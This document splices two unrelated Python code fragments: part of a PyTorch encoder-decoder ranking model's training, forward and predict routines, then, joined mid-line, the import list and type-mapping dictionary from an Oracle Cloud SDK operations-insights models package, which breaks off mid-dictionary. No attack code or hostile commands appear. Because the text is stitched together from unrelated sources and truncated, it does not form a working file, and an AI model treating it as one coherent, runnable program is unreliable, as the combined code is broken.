if len(x_i_list) == 0:
x_i = torch.zeros(self.hidden_size, dtype=torch.float64, device=tdevice)
else:
x_i = torch.stack(x_i_list, dim=0)
'''
# Average the chosen items to use as input to the decoder
x_i = x_i.view(-1, hidden_size)
if x_i.size(0) > 1:
x_i = torch.mean(x_i, dim=0)
#print('x_i:', x_i.size())
x_list.append(x_i)
# Create the target prob distribution
'''
target_tensor_zero = torch.zeros((seq_length, 1), dtype=torch.float64, device=tdevice, requires_grad=False)
target_tensor_one = torch.ones((seq_length, 1), dtype=torch.float64, device=tdevice, requires_grad=False)
target_tensor = torch.cat((target_tensor_one, target_tensor_zero), dim=1)
'''
target_tensor = torch.zeros((seq_length), dtype=torch.float64, device=tdevice, requires_grad=False)
#print('target_tensor size:', target_tensor.size())
if di < len(correct_indices):
for val in correct_indices[di]:
target_tensor[val] = 1.0
#target_tensor[val][0] = 0.0
#print('corr:', correct_indices[di], 'target_tensor:', target_tensor)
target_tensor = target_tensor.view(1, seq_length)
target_probs.append(target_tensor)
#print(di, 'target:', target_tensor)
#print(di, 'predic:', log_probs)
# Calculate loss per timestep
#loss += criterion(output_matrix.view(1, -1, 2), target_tensor)
#print('loss:', loss.item())
#loss.backward(retain_graph=True)
#encoder_optimizer.step()
#decoder_optimizer.step()
di += 1
output_indices.append(current_rank)
# Un-invert the ranks
if self.invert_ranks:
output_indices.reverse()
#output_ranks = indices_to_ranks(output_indices)
#if i==0: print('output_indices:', output_indices)
output_tensor = torch.stack(output_probs)
#print('output_probs:', output_tensor.size())
output_tensor = output_tensor.view(num_timesteps, seq_length)
if num_timesteps > 1:
target_tensor = torch.stack(target_probs)
#print('target_probs:', target_tensor.size())
target_tensor = target_tensor.view(num_timesteps, seq_length)
target_tensor = smooth_distribution(target_tensor, self.sigma)
else:
target_tensor = target_probs[0].view(1, -1)
print('target:', target_tensor)
#target_tensor = torch.log(target_tensor)
print('output tensor:', output_tensor)
#print('target smoothed:', target_tensor)
print('output:', output_tensor.size(), 'target:', target_tensor.size())
loss = criterion(output_tensor, target_tensor)
#loss = criterion(torch.tensor(output_ranks, dtype=torch.float, device=tdevice, requires_grad=True), correct_ranks)
print('loss:', loss.item())
loss.backward()
encoder_optimizer.step()
decoder_optimizer.step()
#return loss.item() / target_length
if (i) % print_every == 0:
print('Epoch [%d/%d], Loss: %.4f' %(epoch, num_epochs, loss.item()))
i += 1
# Save checkpoint
torch.save({'epoch': epoch, 'encoder': self.encoder.state_dict(), 'decoder': self.decoder.state_dict(),
'encoder_optimizer': encoder_optimizer.state_dict(), 'decoder_optimizer': decoder_optimizer.state_dict(), 'loss': loss},
os.path.join(self.checkpoint_dir, 'checkpoint.pth'))
print('Saved checkpoint for epoch', epoch)
print('training took', time.time()-start, 's')
def forward(self, x, batch_size=1, return_encodings=True):
#print("X 000:", str(type(testX[0][0][0])))
#print("X list:", str(len(x)))
outputs = []
max_di = 1000
encodings = []
# Run the model
batchXnp = x
#if debug: print("batchX len:", len(batchXnp))
#print("batchX size:", str(batchX.size()), "batchY size:", str(batchY.size()))
if debug: print("forward x:", str(batchXnp))
seq_length = len(batchXnp)
#input_length = self.encoder.read_cycles
#if debug: print("test seq_length:", str(seq_length))
if seq_length == 0:
output_ranks = []
else:
#with torch.no_grad():
# Run the encoder
mem_block, encoder_hidden = self.encoder(batchXnp)
if return_encodings:
encodings = mem_block
#encodings.append(mem_block)
# Run the decoder
decoder_hidden = encoder_hidden
# Initialize the prediction
x_i = torch.zeros(self.encoder.hidden_size, dtype=torch.float64, device=tdevice)
output_indices = []
done_mask = torch.ones(seq_length, dtype=torch.float64, device=tdevice)
# Run until we've picked all the items
chosen = []
di = 0
#avg_gap = 0.0
while torch.max(done_mask).item() > 0.0 and (di < max_di):
index, decoder_hidden, done_mask, log_probs = self.decoder(x_i.view(1, -1), decoder_hidden, mem_block, done_mask)
# Select multiple items at each timestep
index = int(index.item())
# Allow multiple events to be output at the same rank (prob threshold?)
log_probs = log_probs * done_mask
# Fix any nans
for li in range(log_probs.size(0)):
if math.isnan(log_probs[li]) or done_mask[li] == float('-inf'):
log_probs[li] = float('-inf')
print('test di:', di, 'mask:', done_mask)
print('log_probs:', log_probs)
max_tensor, index_tensor = torch.max(log_probs, dim=0)
#target_index = int(index_tensor.item())
max_prob = max_tensor.item()
#print('max_prob:', max_prob)
targets = []
n = float(log_probs.size(0))
#print('n:', n)
for j in range(log_probs.size(0)):
if done_mask[j] > 0.0:# or max_prob == 0.0:
prob = log_probs[j]
if (math.fabs(max_prob - prob) <= (self.group_thresh)) or math.isinf(max_prob):
targets.append(j)
print('choosing item', j, 'with prob', log_probs[j].item())
done_mask[j] = float('-inf')
if len(targets) > 0:
output_indices.append(targets)
xi_list = []
x_i = torch.zeros(self.hidden_size, dtype=torch.float64, device=tdevice)
print('targets:', len(targets), targets)
for ti in targets:
x_i = mem_block[ti]
xi_list.append(x_i)
if len(xi_list) > 1:
x_i = torch.mean(torch.stack(xi_list), dim=0)
#print('test x_i:', x_i.size())
di += 1
# End torch.no_grad
#output_indices.append(current_rank)
# Un-invert the ranks
if self.invert_ranks:
output_indices.reverse()
output_ranks = indices_to_ranks(output_indices)
print('output_ranks:', output_ranks)
# end if seq_length > 0
outputs = torch.tensor(output_ranks, dtype=torch.float).view(1, -1)
#outputs.append(output_ranks)
if not return_encodings:
del mem_block
del encoder_hidden
torch.cuda.empty_cache()
if return_encodings:
return outputs, encodings
else:
return outputs
def predict(self, testX, batch_size=1, return_encodings=False):
#print("X 000:", str(type(testX[0][0][0])))
#print("X list:", str(len(testX)))
outputs = []
max_di = 1000
encodings = []
# Run the model
for i in range(len(testX)):
batchXnp = testX[i]
#if debug: print("batchX len:", len(batchXnp))
#print("batchX size:", str(batchX.size()), "batchY size:", str(batchY.size()))
#if debug: print("testX[0]:", str(batchXnp[0]))
seq_length = len(batchXnp)
#input_length = self.encoder.read_cycles
#if debug: print("test seq_length:", str(seq_length))
if seq_length == 0:
output_ranks = []
encodings.append(None)
else:
with torch.no_grad():
# Run the encoder
mem_block, encoder_hidden = self.encoder(batchXnp)
if return_encodings:
encodings.append(mem_block)
# Run the decoder
decoder_hidden = encoder_hidden
# Initialize the prediction
x_i = torch.zeros(self.encoder.hidden_size, dtype=torch.float64, device=tdevice)
output_indices = []
done_mask = torch.ones(seq_length, dtype=torch.float64, device=tdevice)
# Run until we've picked all the items
#current_rank = []
#x_list = []
# Run until we've picked all the items
chosen = []
di = 0
#avg_gap = 0.0
while torch.max(done_mask).item() > 0.0 and (di < max_di):
index, decoder_hidden, done_mask, log_probs = self.decoder(x_i.view(1, -1), decoder_hidden, mem_block, done_mask)
# Select multiple items at each timestep
index = int(index.item())
# Allow multiple events to be output at the same rank (prob threshold?)
log_probs = log_probs * done_mask
# Fix any nans
for li in range(log_probs.size(0)):
if math.isnan(log_probs[li]) or done_mask[li] == float('-inf'):
log_probs[li] = float('-inf')
print('test di:', di, 'mask:', done_mask)
print('log_probs:', log_probs)
max_tensor, index_tensor = torch.max(log_probs, dim=0)
#target_index = int(index_tensor.item())
max_prob = max_tensor.item()
#print('max_prob:', max_prob)
targets = []
n = float(log_probs.size(0))
#print('n:', n)
# Elastic probability threshold
'''
if di == 0:
if math.isinf(max_prob):
avg_gap = 0.0
else:
probs2 = log_probs.tolist()
sorted_probs = []
for prob in probs2:
if not math.isinf(prob): # Ignore -inf values
sorted_probs.append(prob)
# Remove outliers
elements = numpy.array(sorted_probs)
prob_mean = numpy.mean(elements, axis=0)
prob_sd = numpy.std(elements, axis=0)
sorted_probs = [x for x in sorted_probs if (x > prob_mean - 1 * prob_sd)]
sorted_probs = [x for x in sorted_probs if (x < prob_mean + 1 * prob_sd)]
if len(sorted_probs) < 2: # Make sure there are at least 2 probs left
avg_gap = 0.0
else:
sorted(sorted_probs, reverse=True)
gaps = []
for gindex in range(1, len(sorted_probs)):
gval = sorted_probs[gindex]
prev = sorted_probs[gindex-1]
diff = math.fabs(gval-prev)
gaps.append(diff)
avg_gap = torch.mean(torch.tensor(gaps, dtype=torch.float64, device=tdevice)).item()/2.0
#print('avg_gap:', avg_gap)
'''
for j in range(log_probs.size(0)):
if done_mask[j] > 0.0:# or max_prob == 0.0:
prob = log_probs[j]
if (math.fabs(max_prob - prob) <= (self.group_thresh)) | |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from .add_em_managed_external_exadata_insight_members_details import AddEmManagedExternalExadataInsightMembersDetails
from .add_exadata_insight_members_details import AddExadataInsightMembersDetails
from .autonomous_database_configuration_summary import AutonomousDatabaseConfigurationSummary
from .autonomous_database_insight import AutonomousDatabaseInsight
from .autonomous_database_insight_summary import AutonomousDatabaseInsightSummary
from .awr_hub import AwrHub
from .awr_hub_summary import AwrHubSummary
from .awr_hub_summary_collection import AwrHubSummaryCollection
from .awr_hubs import AwrHubs
from .awr_report import AwrReport
from .awr_snapshot_collection import AwrSnapshotCollection
from .awr_snapshot_summary import AwrSnapshotSummary
from .awr_source_summary import AwrSourceSummary
from .change_database_insight_compartment_details import ChangeDatabaseInsightCompartmentDetails
from .change_enterprise_manager_bridge_compartment_details import ChangeEnterpriseManagerBridgeCompartmentDetails
from .change_exadata_insight_compartment_details import ChangeExadataInsightCompartmentDetails
from .change_host_insight_compartment_details import ChangeHostInsightCompartmentDetails
from .change_operations_insights_private_endpoint_compartment_details import ChangeOperationsInsightsPrivateEndpointCompartmentDetails
from .change_pe_comanaged_database_insight_details import ChangePeComanagedDatabaseInsightDetails
from .connection_details import ConnectionDetails
from .create_awr_hub_details import CreateAwrHubDetails
from .create_database_insight_details import CreateDatabaseInsightDetails
from .create_em_managed_external_database_insight_details import CreateEmManagedExternalDatabaseInsightDetails
from .create_em_managed_external_exadata_insight_details import CreateEmManagedExternalExadataInsightDetails
from .create_em_managed_external_exadata_member_entity_details import CreateEmManagedExternalExadataMemberEntityDetails
from .create_em_managed_external_host_insight_details import CreateEmManagedExternalHostInsightDetails
from .create_enterprise_manager_bridge_details import CreateEnterpriseManagerBridgeDetails
from .create_exadata_insight_details import CreateExadataInsightDetails
from .create_host_insight_details import CreateHostInsightDetails
from .create_macs_managed_external_host_insight_details import CreateMacsManagedExternalHostInsightDetails
from .create_operations_insights_private_endpoint_details import CreateOperationsInsightsPrivateEndpointDetails
from .create_operations_insights_warehouse_details import CreateOperationsInsightsWarehouseDetails
from .create_operations_insights_warehouse_user_details import CreateOperationsInsightsWarehouseUserDetails
from .create_pe_comanaged_database_insight_details import CreatePeComanagedDatabaseInsightDetails
from .credential_by_vault import CredentialByVault
from .credential_details import CredentialDetails
from .credentials_by_source import CredentialsBySource
from .db_external_instance import DBExternalInstance
from .db_external_properties import DBExternalProperties
from .dbos_config_instance import DBOSConfigInstance
from .database_configuration_collection import DatabaseConfigurationCollection
from .database_configuration_metric_group import DatabaseConfigurationMetricGroup
from .database_configuration_summary import DatabaseConfigurationSummary
from .database_details import DatabaseDetails
from .database_insight import DatabaseInsight
from .database_insight_summary import DatabaseInsightSummary
from .database_insights import DatabaseInsights
from .database_insights_collection import DatabaseInsightsCollection
from .disk_group_details import DiskGroupDetails
from .download_operations_insights_warehouse_wallet_details import DownloadOperationsInsightsWarehouseWalletDetails
from .em_managed_external_database_configuration_summary import EmManagedExternalDatabaseConfigurationSummary
from .em_managed_external_database_insight import EmManagedExternalDatabaseInsight
from .em_managed_external_database_insight_summary import EmManagedExternalDatabaseInsightSummary
from .em_managed_external_exadata_insight import EmManagedExternalExadataInsight
from .em_managed_external_exadata_insight_summary import EmManagedExternalExadataInsightSummary
from .em_managed_external_host_configuration_summary import EmManagedExternalHostConfigurationSummary
from .em_managed_external_host_insight import EmManagedExternalHostInsight
from .em_managed_external_host_insight_summary import EmManagedExternalHostInsightSummary
from .enable_database_insight_details import EnableDatabaseInsightDetails
from .enable_em_managed_external_database_insight_details import EnableEmManagedExternalDatabaseInsightDetails
from .enable_em_managed_external_exadata_insight_details import EnableEmManagedExternalExadataInsightDetails
from .enable_em_managed_external_host_insight_details import EnableEmManagedExternalHostInsightDetails
from .enable_exadata_insight_details import EnableExadataInsightDetails
from .enable_host_insight_details import EnableHostInsightDetails
from .enable_macs_managed_external_host_insight_details import EnableMacsManagedExternalHostInsightDetails
from .enable_pe_comanaged_database_insight_details import EnablePeComanagedDatabaseInsightDetails
from .enterprise_manager_bridge import EnterpriseManagerBridge
from .enterprise_manager_bridge_collection import EnterpriseManagerBridgeCollection
from .enterprise_manager_bridge_summary import EnterpriseManagerBridgeSummary
from .enterprise_manager_bridges import EnterpriseManagerBridges
from .exadata_configuration_collection import ExadataConfigurationCollection
from .exadata_configuration_summary import ExadataConfigurationSummary
from .exadata_database_machine_configuration_summary import ExadataDatabaseMachineConfigurationSummary
from .exadata_database_statistics_summary import ExadataDatabaseStatisticsSummary
from .exadata_details import ExadataDetails
from .exadata_diskgroup_statistics_summary import ExadataDiskgroupStatisticsSummary
from .exadata_host_statistics_summary import ExadataHostStatisticsSummary
from .exadata_insight import ExadataInsight
from .exadata_insight_resource_capacity_trend_aggregation import ExadataInsightResourceCapacityTrendAggregation
from .exadata_insight_resource_capacity_trend_summary import ExadataInsightResourceCapacityTrendSummary
from .exadata_insight_resource_forecast_trend_summary import ExadataInsightResourceForecastTrendSummary
from .exadata_insight_resource_insight_utilization_item import ExadataInsightResourceInsightUtilizationItem
from .exadata_insight_resource_statistics import ExadataInsightResourceStatistics
from .exadata_insight_resource_statistics_aggregation import ExadataInsightResourceStatisticsAggregation
from .exadata_insight_summary import ExadataInsightSummary
from .exadata_insight_summary_collection import ExadataInsightSummaryCollection
from .exadata_insights import ExadataInsights
from .exadata_member_collection import ExadataMemberCollection
from .exadata_member_summary import ExadataMemberSummary
from .exadata_storage_server_statistics_summary import ExadataStorageServerStatisticsSummary
from .historical_data_item import HistoricalDataItem
from .host_configuration_collection import HostConfigurationCollection
from .host_configuration_metric_group import HostConfigurationMetricGroup
from .host_configuration_summary import HostConfigurationSummary
from .host_cpu_hardware_configuration import HostCpuHardwareConfiguration
from .host_cpu_statistics import HostCpuStatistics
from .host_cpu_usage import HostCpuUsage
from .host_details import HostDetails
from .host_entities import HostEntities
from .host_hardware_configuration import HostHardwareConfiguration
from .host_importable_agent_entity_summary import HostImportableAgentEntitySummary
from .host_insight import HostInsight
from .host_insight_resource_statistics_aggregation import HostInsightResourceStatisticsAggregation
from .host_insight_summary import HostInsightSummary
from .host_insight_summary_collection import HostInsightSummaryCollection
from .host_insights import HostInsights
from .host_instance_map import HostInstanceMap
from .host_memory_configuration import HostMemoryConfiguration
from .host_memory_statistics import HostMemoryStatistics
from .host_memory_usage import HostMemoryUsage
from .host_network_activity_summary import HostNetworkActivitySummary
from .host_network_configuration import HostNetworkConfiguration
from .host_performance_metric_group import HostPerformanceMetricGroup
from .host_product import HostProduct
from .host_resource_allocation import HostResourceAllocation
from .host_resource_capacity_trend_aggregation import HostResourceCapacityTrendAggregation
from .host_resource_statistics import HostResourceStatistics
from .host_top_processes import HostTopProcesses
from .hosted_entity_collection import HostedEntityCollection
from .hosted_entity_summary import HostedEntitySummary
from .importable_agent_entity_summary import ImportableAgentEntitySummary
from .importable_agent_entity_summary_collection import ImportableAgentEntitySummaryCollection
from .importable_enterprise_manager_entity import ImportableEnterpriseManagerEntity
from .importable_enterprise_manager_entity_collection import ImportableEnterpriseManagerEntityCollection
from .ingest_database_configuration_details import IngestDatabaseConfigurationDetails
from .ingest_database_configuration_response_details import IngestDatabaseConfigurationResponseDetails
from .ingest_host_configuration_details import IngestHostConfigurationDetails
from .ingest_host_configuration_response_details import IngestHostConfigurationResponseDetails
from .ingest_host_metrics_details import IngestHostMetricsDetails
from .ingest_host_metrics_response_details import IngestHostMetricsResponseDetails
from .ingest_sql_bucket_details import IngestSqlBucketDetails
from .ingest_sql_bucket_response_details import IngestSqlBucketResponseDetails
from .ingest_sql_plan_lines_details import IngestSqlPlanLinesDetails
from .ingest_sql_plan_lines_response_details import IngestSqlPlanLinesResponseDetails
from .ingest_sql_stats_details import IngestSqlStatsDetails
from .ingest_sql_stats_response_details import IngestSqlStatsResponseDetails
from .ingest_sql_text_details import IngestSqlTextDetails
from .ingest_sql_text_response_details import IngestSqlTextResponseDetails
from .instance_metrics import InstanceMetrics
from .macs_managed_external_database_configuration_summary import MacsManagedExternalDatabaseConfigurationSummary
from .macs_managed_external_database_insight import MacsManagedExternalDatabaseInsight
from .macs_managed_external_database_insight_summary import MacsManagedExternalDatabaseInsightSummary
from .macs_managed_external_host_configuration_summary import MacsManagedExternalHostConfigurationSummary
from .macs_managed_external_host_insight import MacsManagedExternalHostInsight
from .macs_managed_external_host_insight_summary import MacsManagedExternalHostInsightSummary
from .operations_insights_private_endpoint import OperationsInsightsPrivateEndpoint
from .operations_insights_private_endpoint_collection import OperationsInsightsPrivateEndpointCollection
from .operations_insights_private_endpoint_summary import OperationsInsightsPrivateEndpointSummary
from .operations_insights_warehouse import OperationsInsightsWarehouse
from .operations_insights_warehouse_summary import OperationsInsightsWarehouseSummary
from .operations_insights_warehouse_summary_collection import OperationsInsightsWarehouseSummaryCollection
from .operations_insights_warehouse_user import OperationsInsightsWarehouseUser
from .operations_insights_warehouse_user_summary import OperationsInsightsWarehouseUserSummary
from .operations_insights_warehouse_user_summary_collection import OperationsInsightsWarehouseUserSummaryCollection
from .operations_insights_warehouse_users import OperationsInsightsWarehouseUsers
from .operations_insights_warehouses import OperationsInsightsWarehouses
from .pe_comanaged_database_connection_details import PeComanagedDatabaseConnectionDetails
from .pe_comanaged_database_host_details import PeComanagedDatabaseHostDetails
from .pe_comanaged_database_insight import PeComanagedDatabaseInsight
from .pe_comanaged_database_insight_summary import PeComanagedDatabaseInsightSummary
from .pe_comanaged_managed_external_database_configuration_summary import PeComanagedManagedExternalDatabaseConfigurationSummary
from .projected_data_item import ProjectedDataItem
from .resource_capacity_trend_aggregation import ResourceCapacityTrendAggregation
from .resource_insight_current_utilization import ResourceInsightCurrentUtilization
from .resource_insight_projected_utilization import ResourceInsightProjectedUtilization
from .resource_insight_projected_utilization_item import ResourceInsightProjectedUtilizationItem
from .resource_statistics import ResourceStatistics
from .resource_statistics_aggregation import ResourceStatisticsAggregation
from .resource_usage_summary import ResourceUsageSummary
from .resource_usage_trend_aggregation import ResourceUsageTrendAggregation
from .sql_bucket import SqlBucket
from .sql_insight_aggregation import SqlInsightAggregation
from .sql_insight_aggregation_collection import SqlInsightAggregationCollection
from .sql_insight_thresholds import SqlInsightThresholds
from .sql_inventory import SqlInventory
from .sql_plan_collection import SqlPlanCollection
from .sql_plan_insight_aggregation import SqlPlanInsightAggregation
from .sql_plan_insight_aggregation_collection import SqlPlanInsightAggregationCollection
from .sql_plan_insights import SqlPlanInsights
from .sql_plan_line import SqlPlanLine
from .sql_plan_summary import SqlPlanSummary
from .sql_response_time_distribution_aggregation import SqlResponseTimeDistributionAggregation
from .sql_response_time_distribution_aggregation_collection import SqlResponseTimeDistributionAggregationCollection
from .sql_search_collection import SqlSearchCollection
from .sql_search_summary import SqlSearchSummary
from .sql_statistic_aggregation import SqlStatisticAggregation
from .sql_statistic_aggregation_collection import SqlStatisticAggregationCollection
from .sql_statistics import SqlStatistics
from .sql_statistics_time_series import SqlStatisticsTimeSeries
from .sql_statistics_time_series_aggregation import SqlStatisticsTimeSeriesAggregation
from .sql_statistics_time_series_aggregation_collection import SqlStatisticsTimeSeriesAggregationCollection
from .sql_statistics_time_series_by_plan_aggregation import SqlStatisticsTimeSeriesByPlanAggregation
from .sql_statistics_time_series_by_plan_aggregation_collection import SqlStatisticsTimeSeriesByPlanAggregationCollection
from .sql_stats import SqlStats
from .sql_text import SqlText
from .sql_text_collection import SqlTextCollection
from .sql_text_summary import SqlTextSummary
from .storage_server_details import StorageServerDetails
from .summarize_awr_sources_summaries_collection import SummarizeAwrSourcesSummariesCollection
from .summarize_database_insight_resource_capacity_trend_aggregation_collection import SummarizeDatabaseInsightResourceCapacityTrendAggregationCollection
from .summarize_database_insight_resource_forecast_trend_aggregation import SummarizeDatabaseInsightResourceForecastTrendAggregation
from .summarize_database_insight_resource_statistics_aggregation_collection import SummarizeDatabaseInsightResourceStatisticsAggregationCollection
from .summarize_database_insight_resource_usage_aggregation import SummarizeDatabaseInsightResourceUsageAggregation
from .summarize_database_insight_resource_usage_trend_aggregation_collection import SummarizeDatabaseInsightResourceUsageTrendAggregationCollection
from .summarize_database_insight_resource_utilization_insight_aggregation import SummarizeDatabaseInsightResourceUtilizationInsightAggregation
from .summarize_database_insight_tablespace_usage_trend_aggregation_collection import SummarizeDatabaseInsightTablespaceUsageTrendAggregationCollection
from .summarize_exadata_insight_resource_capacity_trend_aggregation import SummarizeExadataInsightResourceCapacityTrendAggregation
from .summarize_exadata_insight_resource_capacity_trend_collection import SummarizeExadataInsightResourceCapacityTrendCollection
from .summarize_exadata_insight_resource_forecast_trend_aggregation import SummarizeExadataInsightResourceForecastTrendAggregation
from .summarize_exadata_insight_resource_forecast_trend_collection import SummarizeExadataInsightResourceForecastTrendCollection
from .summarize_exadata_insight_resource_statistics_aggregation_collection import SummarizeExadataInsightResourceStatisticsAggregationCollection
from .summarize_exadata_insight_resource_usage_aggregation import SummarizeExadataInsightResourceUsageAggregation
from .summarize_exadata_insight_resource_usage_collection import SummarizeExadataInsightResourceUsageCollection
from .summarize_exadata_insight_resource_utilization_insight_aggregation import SummarizeExadataInsightResourceUtilizationInsightAggregation
from .summarize_host_insight_resource_capacity_trend_aggregation_collection import SummarizeHostInsightResourceCapacityTrendAggregationCollection
from .summarize_host_insight_resource_forecast_trend_aggregation import SummarizeHostInsightResourceForecastTrendAggregation
from .summarize_host_insight_resource_statistics_aggregation_collection import SummarizeHostInsightResourceStatisticsAggregationCollection
from .summarize_host_insight_resource_usage_aggregation import SummarizeHostInsightResourceUsageAggregation
from .summarize_host_insight_resource_usage_trend_aggregation_collection import SummarizeHostInsightResourceUsageTrendAggregationCollection
from .summarize_host_insight_resource_utilization_insight_aggregation import SummarizeHostInsightResourceUtilizationInsightAggregation
from .summarize_host_insights_top_processes_usage_trend_collection import SummarizeHostInsightsTopProcessesUsageTrendCollection
from .summarize_operations_insights_warehouse_resource_usage_aggregation import SummarizeOperationsInsightsWarehouseResourceUsageAggregation
from .summary_statistics import SummaryStatistics
from .tablespace_usage_trend import TablespaceUsageTrend
from .tablespace_usage_trend_aggregation import TablespaceUsageTrendAggregation
from .top_processes_usage_trend import TopProcessesUsageTrend
from .top_processes_usage_trend_aggregation import TopProcessesUsageTrendAggregation
from .update_autonomous_database_insight_details import UpdateAutonomousDatabaseInsightDetails
from .update_awr_hub_details import UpdateAwrHubDetails
from .update_database_insight_details import UpdateDatabaseInsightDetails
from .update_em_managed_external_database_insight_details import UpdateEmManagedExternalDatabaseInsightDetails
from .update_em_managed_external_exadata_insight_details import UpdateEmManagedExternalExadataInsightDetails
from .update_em_managed_external_host_insight_details import UpdateEmManagedExternalHostInsightDetails
from .update_enterprise_manager_bridge_details import UpdateEnterpriseManagerBridgeDetails
from .update_exadata_insight_details import UpdateExadataInsightDetails
from .update_host_insight_details import UpdateHostInsightDetails
from .update_macs_managed_external_database_insight_details import UpdateMacsManagedExternalDatabaseInsightDetails
from .update_macs_managed_external_host_insight_details import UpdateMacsManagedExternalHostInsightDetails
from .update_operations_insights_private_endpoint_details import UpdateOperationsInsightsPrivateEndpointDetails
from .update_operations_insights_warehouse_details import UpdateOperationsInsightsWarehouseDetails
from .update_operations_insights_warehouse_user_details import UpdateOperationsInsightsWarehouseUserDetails
from .update_pe_comanaged_database_insight_details import UpdatePeComanagedDatabaseInsightDetails
from .work_request import WorkRequest
from .work_request_collection import WorkRequestCollection
from .work_request_error import WorkRequestError
from .work_request_error_collection import WorkRequestErrorCollection
from .work_request_log_entry import WorkRequestLogEntry
from .work_request_log_entry_collection import WorkRequestLogEntryCollection
from .work_request_resource import WorkRequestResource
from .work_requests import WorkRequests
# Maps type names to classes for opsi services.
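# A hypothetical usage sketch (illustrative only, not taken from the SDK itself):
# given a payload's declared type name, the mapping below can be used to look up
# the corresponding model class, e.g.
#   cls = opsi_type_mapping.get("DatabaseInsightSummary")
#   if cls is not None:
#       instance = cls()  # attributes would then be populated from the response payload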
opsi_type_mapping = {
"AddEmManagedExternalExadataInsightMembersDetails": AddEmManagedExternalExadataInsightMembersDetails,
"AddExadataInsightMembersDetails": AddExadataInsightMembersDetails,
"AutonomousDatabaseConfigurationSummary": AutonomousDatabaseConfigurationSummary,
"AutonomousDatabaseInsight": AutonomousDatabaseInsight,
"AutonomousDatabaseInsightSummary": AutonomousDatabaseInsightSummary,
"AwrHub": AwrHub,
"AwrHubSummary": AwrHubSummary,
"AwrHubSummaryCollection": AwrHubSummaryCollection,
"AwrHubs": AwrHubs,
"AwrReport": AwrReport,
"AwrSnapshotCollection": AwrSnapshotCollection,
"AwrSnapshotSummary": AwrSnapshotSummary,
"AwrSourceSummary": AwrSourceSummary,
"ChangeDatabaseInsightCompartmentDetails": ChangeDatabaseInsightCompartmentDetails,
"ChangeEnterpriseManagerBridgeCompartmentDetails": ChangeEnterpriseManagerBridgeCompartmentDetails,
"ChangeExadataInsightCompartmentDetails": ChangeExadataInsightCompartmentDetails,
"ChangeHostInsightCompartmentDetails": ChangeHostInsightCompartmentDetails,
"ChangeOperationsInsightsPrivateEndpointCompartmentDetails": ChangeOperationsInsightsPrivateEndpointCompartmentDetails,
"ChangePeComanagedDatabaseInsightDetails": ChangePeComanagedDatabaseInsightDetails,
"ConnectionDetails": ConnectionDetails,
"CreateAwrHubDetails": CreateAwrHubDetails,
"CreateDatabaseInsightDetails": CreateDatabaseInsightDetails,
"CreateEmManagedExternalDatabaseInsightDetails": CreateEmManagedExternalDatabaseInsightDetails,
"CreateEmManagedExternalExadataInsightDetails": CreateEmManagedExternalExadataInsightDetails,
"CreateEmManagedExternalExadataMemberEntityDetails": CreateEmManagedExternalExadataMemberEntityDetails,
"CreateEmManagedExternalHostInsightDetails": CreateEmManagedExternalHostInsightDetails,
"CreateEnterpriseManagerBridgeDetails": CreateEnterpriseManagerBridgeDetails,
"CreateExadataInsightDetails": CreateExadataInsightDetails,
"CreateHostInsightDetails": CreateHostInsightDetails,
"CreateMacsManagedExternalHostInsightDetails": CreateMacsManagedExternalHostInsightDetails,
"CreateOperationsInsightsPrivateEndpointDetails": CreateOperationsInsightsPrivateEndpointDetails,
"CreateOperationsInsightsWarehouseDetails": CreateOperationsInsightsWarehouseDetails,
"CreateOperationsInsightsWarehouseUserDetails": CreateOperationsInsightsWarehouseUserDetails,
"CreatePeComanagedDatabaseInsightDetails": CreatePeComanagedDatabaseInsightDetails,
"CredentialByVault": CredentialByVault,
"CredentialDetails": CredentialDetails,
"CredentialsBySource": CredentialsBySource,
"DBExternalInstance": DBExternalInstance,
"DBExternalProperties": DBExternalProperties,
"DBOSConfigInstance": DBOSConfigInstance,
"DatabaseConfigurationCollection": DatabaseConfigurationCollection,
"DatabaseConfigurationMetricGroup": DatabaseConfigurationMetricGroup,
"DatabaseConfigurationSummary": DatabaseConfigurationSummary,
"DatabaseDetails": DatabaseDetails,
"DatabaseInsight": DatabaseInsight,
"DatabaseInsightSummary": DatabaseInsightSummary,
"DatabaseInsights": DatabaseInsights,
"DatabaseInsightsCollection": DatabaseInsightsCollection,
"DiskGroupDetails": DiskGroupDetails,
"DownloadOperationsInsightsWarehouseWalletDetails": DownloadOperationsInsightsWarehouseWalletDetails,
"EmManagedExternalDatabaseConfigurationSummary": EmManagedExternalDatabaseConfigurationSummary,
"EmManagedExternalDatabaseInsight": EmManagedExternalDatabaseInsight,
"EmManagedExternalDatabaseInsightSummary": EmManagedExternalDatabaseInsightSummary,
"EmManagedExternalExadataInsight": EmManagedExternalExadataInsight,
"EmManagedExternalExadataInsightSummary": EmManagedExternalExadataInsightSummary,
"EmManagedExternalHostConfigurationSummary": EmManagedExternalHostConfigurationSummary,
"EmManagedExternalHostInsight": EmManagedExternalHostInsight,
"EmManagedExternalHostInsightSummary": EmManagedExternalHostInsightSummary,
"EnableDatabaseInsightDetails": EnableDatabaseInsightDetails,
"EnableEmManagedExternalDatabaseInsightDetails": EnableEmManagedExternalDatabaseInsightDetails,
"EnableEmManagedExternalExadataInsightDetails": EnableEmManagedExternalExadataInsightDetails,
"EnableEmManagedExternalHostInsightDetails": EnableEmManagedExternalHostInsightDetails,
"EnableExadataInsightDetails": EnableExadataInsightDetails,
"EnableHostInsightDetails": EnableHostInsightDetails,
"EnableMacsManagedExternalHostInsightDetails": EnableMacsManagedExternalHostInsightDetails,
"EnablePeComanagedDatabaseInsightDetails": EnablePeComanagedDatabaseInsightDetails,
"EnterpriseManagerBridge": EnterpriseManagerBridge,
"EnterpriseManagerBridgeCollection": EnterpriseManagerBridgeCollection,
"EnterpriseManagerBridgeSummary": EnterpriseManagerBridgeSummary,
"EnterpriseManagerBridges": EnterpriseManagerBridges,
"ExadataConfigurationCollection": ExadataConfigurationCollection,
"ExadataConfigurationSummary": ExadataConfigurationSummary,
"ExadataDatabaseMachineConfigurationSummary": ExadataDatabaseMachineConfigurationSummary,
"ExadataDatabaseStatisticsSummary": ExadataDatabaseStatisticsSummary,
"ExadataDetails": ExadataDetails,
"ExadataDiskgroupStatisticsSummary": ExadataDiskgroupStatisticsSummary,
"ExadataHostStatisticsSummary": ExadataHostStatisticsSummary,
"ExadataInsight": ExadataInsight,
